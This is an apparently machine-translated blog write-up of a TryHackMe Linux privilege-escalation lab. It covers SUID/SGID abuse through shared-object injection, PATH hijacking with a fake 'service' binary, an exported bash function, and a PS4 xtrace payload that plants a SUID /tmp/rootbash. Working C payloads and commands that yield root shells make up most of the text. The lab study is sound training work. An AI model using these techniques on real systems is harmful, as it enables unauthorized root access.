![[TryHackMe] Improvement of privileges using SUID/SGID executable files! Linux PrivEsc Writeup Part 7](https://hack-lab-256.com/wp-content/uploads/2023/04/hack-lab-256-samnail-13.jpg)
This time, we will try "Elevation of privileges using SUID/SGID executables (excluding known exploits)."
The target machine uses the Room below of TryHackMe.
"TryHackMe-Linux PrivEsc: https://tryhackme.com/room/linuxprivesc "
This article is part 7.
If you would like to check Writeup for Linux PrivEsc with TryHackMe, please also check Privilege Elevation Using the Vulnerability in Exim 4.84.3
Pochip
Pochip
Pochip
Pochip
Preparation
First, start the target machine.
If you are using TryHackMe, select "Start Machine."
If the IP Address is displayed as shown below, you can start it!
This time, the privilege escalation will occur after you have been able to connect to the target machine, so check to the point where you can connect via SSH.
┌──(hacklab㉿hacklab)-[~] └─$ ssh user@10.10.52.40 user@10.10.52.40's password: Linux debian 2.6.32-5-amd64 #1 SMP Tue May 13 16:34:35 UTC 2014 x86_64 The programs included with the Debian GNU/Linux system are free software; the exact distribution terms for each program are described in the individual files in /usr/share/doc/*/copyright. Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent permitted by applicable law. Last login: Sun Apr 9 08:54:59 2023 from ip-10-18-110-90.eu-west-1.compute.internal user@debian:~$Once you have access, advance preparation is complete.
SUID / SGID Executables – Shared Object Injection
Try sharing object injection for SUID executables.
First, check all the SUID/SGID executable files on the target machine.
user@debian:~$ find / -type f -a \( -perm -u+s -o -perm -g+s \) -exec ls -l {} \; 2> /dev/null -rwxr-sr-x 1 root shadow 19528 Feb 15 2011 /usr/bin/expiry -rwxr-sr-x 1 root ssh 108600 Apr 2 2014 /usr/bin/ssh-agent -rwsr-xr-x 1 root root 37552 Feb 15 2011 /usr/bin/chsh -rwsr-xr-x 2 root root 168136 Jan 5 2016 /usr/bin/sudo -rwxr-sr-x 1 root tty 11000 Jun 17 2010 /usr/bin/bsd-write -rwxr-sr-x 1 root crontab 35040 Dec 18 2010 /usr/bin/crontab -rwsr-xr-x 1 root root 32808 Feb 15 2011 /usr/bin/newgrp -rwsr-xr-x 2 root root 168136 Jan 5 2016 /usr/bin/sudoedit -rwxr-sr-x 1 root shadow 56976 Feb 15 2011 /usr/bin/chage -rwsr-xr-x 1 root root 43280 Feb 15 2011 /usr/bin/passwd -rwsr-xr-x 1 root root 60208 Feb 15 2011 /usr/bin/gpasswd -rwsr-xr-x 1 root root 39856 Feb 15 2011 /usr/bin/chfn -rwxr-sr-x 1 root tty 12000 Jan 25 2011 /usr/bin/wall -rwsr-sr-x 1 root staff 9861 May 14 2017 /usr/local/bin/suid-so -rwsr-sr-x 1 root staff 6883 May 14 2017 /usr/local/bin/suid-env -rwsr-sr-x 1 root staff 6899 May 14 2017 /usr/local/bin/suid-env2 -rwsr-xr-x 1 root root 963691 May 13 2017 /usr/sbin/exim-4.84-3 -rwsr-xr-x 1 root root 6776 Dec 19 2010 /usr/lib/eject/dmcrypt-get-device -rwsr-xr-x 1 root root 212128 Apr 2 2014 /usr/lib/openssh/ssh-keysign -rwsr-xr-x 1 root root 10592 Feb 15 2016 /usr/lib/pt_chown -rwsr-xr-x 1 root root 36640 Oct 14 2010 /bin/ping6 -rwsr-xr-x 1 root root 34248 Oct 14 2010 /bin/ping -rwsr-xr-x 1 root root 78616 Jan 25 2011 /bin/mount -rwsr-xr-x 1 root root 34024 Feb 15 2011 /bin/su -rwsr-xr-x 1 root root 53648 Jan 25 2011 /bin/umount -rwxr-sr-x 1 root shadow 31864 Oct 17 2011 /sbin/unix_chkpwd -rwsr-xr-x 1 root root 94992 Dec 13 2014 /sbin/mount.nfs"/usr/local/bin/suid-so" is vulnerable to shared object injection.
Don't miss it.
Next, try running "/usr/local/bin/suid-so".
In this state, a progress bar will appear.
user@debian:~$ /usr/local/bin/suid-so Calculating something, please wait... [====>] 99 % Done.Next run strace to check for open/access and "no such file" errors.
user@debian:~$ strace /usr/local/bin/suid-so 2>&1 | grep -iE "open|access|no such file" access("/etc/suid-debug", F_OK) = -1 ENOENT (No such file or directory) access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory) access("/etc/ld.so.preload", R_OK) = -1 ENOENT (No such file or directory) open("/etc/ld.so.cache", O_RDONLY) = 3 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory) open("/lib/libdl.so.2", O_RDONLY) = 3 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory) open("/usr/lib/libstdc++.so.6", O_RDONLY) = 3 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory) open("/lib/libm.so.6", O_RDONLY) = 3 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory) open("/lib/libgcc_s.so.1", O_RDONLY) = 3 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory) open("/lib/libc.so.6", O_RDONLY) = 3 open("/home/user/.config/libcalc.so", O_RDONLY) = -1 ENOENT (No such file or directory)Note that you are trying to load /home/user/.config/libcalc.so in your home directory
Place the shared object that generates the Bash in
this " /home/user/.config/libcalc.so The code that generates Bash looks like this:
user@debian:~$ mkdir /home/user/.config user@debian:~$ cat /home/user/tools/suid/libcalc.c #include<stdio.h> #include<stdlib.h> static void inject() __attribute__((constructor)); void inject() { setuid(0); system("/bin/bash -p"); }Let's compile your code into a shared object.
user@debian:~$ gcc -shared -fPIC -o /home/user/.config/libcalc.so /home/user/tools/suid/libcalc.c user@debian:~$ ll .config total 8 -rwxr-xr-x 1 user user 6134 Apr 9 10:31 libcalc.soIf you run "/usr/local/bin/suid-so" again in this state, you will see bash with root privileges, not the progress bar.
user@debian:~$ /usr/local/bin/suid-so Calculating something, please wait... bash-4.1# whoami rootSUID / SGID Executables – Environment Variables
Again, check the SUID/SGID executable file on the target machine.
The next target is "/usr/local/bin/suid-env".
user@debian:~$ find / -type f -a \( -perm -u+s -o -perm -g+s \) -exec ls -l {} \; 2> /dev/null -rwxr-sr-x 1 root shadow 19528 Feb 15 2011 /usr/bin/expiry -rwxr-sr-x 1 root ssh 108600 Apr 2 2014 /usr/bin/ssh-agent -rwsr-xr-x 1 root root 37552 Feb 15 2011 /usr/bin/chsh -rwsr-xr-x 2 root root 168136 Jan 5 2016 /usr/bin/sudo -rwxr-sr-x 1 root tty 11000 Jun 17 2010 /usr/bin/bsd-write -rwxr-sr-x 1 root crontab 35040 Dec 18 2010 /usr/bin/crontab -rwsr-xr-x 1 root root 32808 Feb 15 2011 /usr/bin/newgrp -rwsr-xr-x 2 root root 168136 Jan 5 2016 /usr/bin/sudoedit -rwxr-sr-x 1 root shadow 56976 Feb 15 2011 /usr/bin/chage -rwsr-xr-x 1 root root 43280 Feb 15 2011 /usr/bin/passwd -rwsr-xr-x 1 root root 60208 Feb 15 2011 /usr/bin/gpasswd -rwsr-xr-x 1 root root 39856 Feb 15 2011 /usr/bin/chfn -rwxr-sr-x 1 root tty 12000 Jan 25 2011 /usr/bin/wall -rwsr-sr-x 1 root staff 9861 May 14 2017 /usr/local/bin/suid-so -rwsr-sr-x 1 root staff 6883 May 14 2017 /usr/local/bin/suid-env -rwsr-sr-x 1 root staff 6899 May 14 2017 /usr/local/bin/suid-env2 -rwsr-xr-x 1 root root 963691 May 13 2017 /usr/sbin/exim-4.84-3 -rwsr-xr-x 1 root root 6776 Dec 19 2010 /usr/lib/eject/dmcrypt-get-device -rwsr-xr-x 1 root root 212128 Apr 2 2014 /usr/lib/openssh/ssh-keysign -rwsr-xr-x 1 root root 10592 Feb 15 2016 /usr/lib/pt_chown -rwsr-xr-x 1 root root 36640 Oct 14 2010 /bin/ping6 -rwsr-xr-x 1 root root 34248 Oct 14 2010 /bin/ping -rwsr-xr-x 1 root root 78616 Jan 25 2011 /bin/mount -rwsr-xr-x 1 root root 34024 Feb 15 2011 /bin/su -rwsr-xr-x 1 root root 53648 Jan 25 2011 /bin/umount -rwxr-sr-x 1 root shadow 31864 Oct 17 2011 /sbin/unix_chkpwd -rwsr-xr-x 1 root root 94992 Dec 13 2014 /sbin/mount.nfsFirst, let's try it honestly.
user@debian:~$ /usr/local/bin/suid-env [...] Starting web server: apache2httpd (pid 1773) already running . ok I tried to start apache2, but it appears it has already started.
Next, let's display the contents of suid-env that can be read as a string.
strings is the command that can achieve this.
user@debian:~$ strings /usr/local/bin/suid-env /lib64/ld-linux-x86-64.so.2 5q;Xq __gmon_start__ libc.so.6 setresgid setresuid system __libc_start_main GLIBC_2.2.5 fff. fffff. l$ L t$(L |$0H service apache2 startWhat should be noted here is that the service for "service apache2 start" is not fully loaded.
In other words, if you add a PATH and place a common object called serivce, it will be possible to execute it.
First, write down the code to create a common object.
user@debian:~$ cat /home/user/tools/suid/service.c int main() { setuid(0); system("/bin/bash -p"); }Compile the above code to create a common object called service.
user@debian:~$ gcc -o service /home/user/tools/suid/service.c user@debian:~$ ll total 16 -rw-r--r-- 1 user user 212 May 15 2017 myvpn.ovpn -rwxr-xr-x 1 user user 6697 Apr 9 10:39 service drwxr-xr-x 8 user user 4096 May 15 2020 toolsOnce you have done, run the directory containing the service above as an environment variable.
user@debian:~$ PATH=.:$PATH /usr/local/bin/suid-env root@debian:~# whoami rootI think the common object you just created has been executed and you have gained root privileges.
SUID / SGID Executables – Abusing Shell Features (#1)
Check the SUID/SGID executable file on the target machine.
Next, we will target "/usr/local/bin/suid-env2".
First, just like before, check the strings.
user@debian:~$ strings /usr/local/bin/suid-env2 /lib64/ld-linux-x86-64.so.2 __gmon_start__ libc.so.6 setresgid setresuid system __libc_start_main GLIBC_2.2.5 fff. fffff. l$ L t$(L |$0H /usr/sbin/service apache2 startUnlike before, it's an absolute pass, so it doesn't seem to be possible to use the same method as before.
However, if the bash version is 4.2-048 or earlier, there is a vulnerability in which a shell function name is defined in the file path and exporting the function causes a shell function with the same name as the file path to be executed instead of the actual executable file in that file path.
This time, I would like to use that, so let's start by looking at the bash version.
user@debian:~$ /bin/bash --version GNU bash, version 4.1.5(1)-release (x86_64-pc-linux-gnu) Copyright (C) 2009 Free Software Foundation, Inc. License GPLv3+: GNU GPL version 3 or later<http://gnu.org/licenses/gpl.html> This is free software; you are free to change and redistribute it. There is NO WARRANTY, to the extent permitted by law.It was confirmed that it is below 4.2-048.
Now, create a function called "/usr/sbin/service" that runs the bash shell and export the function.
user@debian:~$ function /usr/sbin/service { /bin/bash -p; } user@debian:~$ export -f /usr/sbin/serviceOnce you've achieved this, run "/usr/local/bin/suid-env2".
user@debian:~$ /usr/local/bin/suid-env2 root@debian:~# whoami rootI was able to obtain root privileges as well.
SUID / SGID Executables – Abusing Shell Features (#2)
If the bash version is 4.4 or lower, root privileges can also be elevated using the PS4 environment variable.
Enable bash debugging and run the executable file "/usr/local/bin/suid-env2".
Create the SUID version of /bin/bash in /tmp/rootbash with PS4 variable set to the embedded command.
user@debian:~$ env -i SHELLOPTS=xtrace PS4='$(cp /bin/bash /tmp/rootbash; chmod +xs /tmp/rootbash)' /usr/local/bin/suid-env2 /usr/sbin/service apache2 start basename /usr/sbin/service VERSION='service ver. 0.91-ubuntu1' basename /usr/sbin/service USAGE='Usage: service < option > | --status-all | [ service_name [ command | --full-restart ] ]' SERVICE= ACTION= SERVICEDIR=/etc/init.d OPTIONS= '[' 2 -eq 0 ']' cd / '[' 2 -gt 0 ']' case "${1}" in '[' -z '' -a 2 -eq 1 -a apache2 = --status-all ']' '[' 2 -eq 2 -a start = --full-restart ']' '[' -z '' ']' SERVICE=apache2 shift '[' 1 -gt 0 ']' case "${1}" in '[' -z apache2 -a 1 -eq 1 -a start = --status-all ']' '[' 1 -eq 2 -a '' = --full-restart ']' '[' -z apache2 ']' '[' -z '' ']' ACTION=start shift '[' 0 -gt 0 ']' '[' -r /etc/init/apache2.conf ']' '[' -x /etc/init.d/apache2 ']' exec env -i LANG= PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/usr/bin:/sbin:/bin TERM=dumb /etc/init.d/apache2 start Starting web server: apache2httpd (pid 1773) already running .Now I think you have created /tmp/rootbash, so let's run it.
user@debian:~$ /tmp/rootbash -p rootbash-4.1# whoami rootI've now got root privileges!
summary
This time, I tried "Privilege Elevation (excluding known exploits) using SUID/SGID executables."
I once again realized that I should only keep the version as new as possible.
References and Sites
--
![[HackTheBox] What to do if "An error of type HTTPClient::ReceiveTimeoutError happened, message is executed expired" appears in Evil-WinRM](https://hack-lab-256.com/wp-content/uploads/2023/09/hack-lab-256-samnail-4-300x169.jpg)
![[CVE-2015-3306] I enumerated the shared Samba, manipulate a vulnerable version of proftpd, and escalated privileges by manipulating path variables! TryHackMe Kenobi Writeup](https://hack-lab-256.com/wp-content/uploads/2023/08/hack-lab-256-samnail-2-300x169.jpg)
![[Permanent CTF for beginners] setodaNote CTF WEB Writeup! Recommended for getting a sense of CTF!](https://hack-lab-256.com/wp-content/uploads/2023/08/hack-lab-256-samnail-1-1-300x169.jpg)
![[TryHackMe] We conducted packet analysis using wireshark to investigate the intrusion of ssh-backdoor! Overpass2 Writeup](https://hack-lab-256.com/wp-content/uploads/2023/08/hack-lab-256-samnail-300x169.jpg)
![[CVE-2018-16763] fuel CMS 1.4.1 - I converted Remote Code Execution (1) to python 3 and hacked it! TryHackMe Ignite Writeup](https://hack-lab-256.com/wp-content/uploads/2023/08/hack-lab-256-samnail-25-300x169.jpg)
![[TryHackMe] I used SSH2John to extract the hash from the private key and hacked the password with John the Ripper! Overpass Writeup](https://hack-lab-256.com/wp-content/uploads/2023/07/hack-lab-256-samnail-24-300x169.jpg)
![[TryHackMe] I tried infiltrating a Windows machine with a ret2esp attack (Buffer Overflow)! Brainstorm Writeup](https://hack-lab-256.com/wp-content/uploads/2023/06/hack-lab-256-samnail-23-300x169.jpg)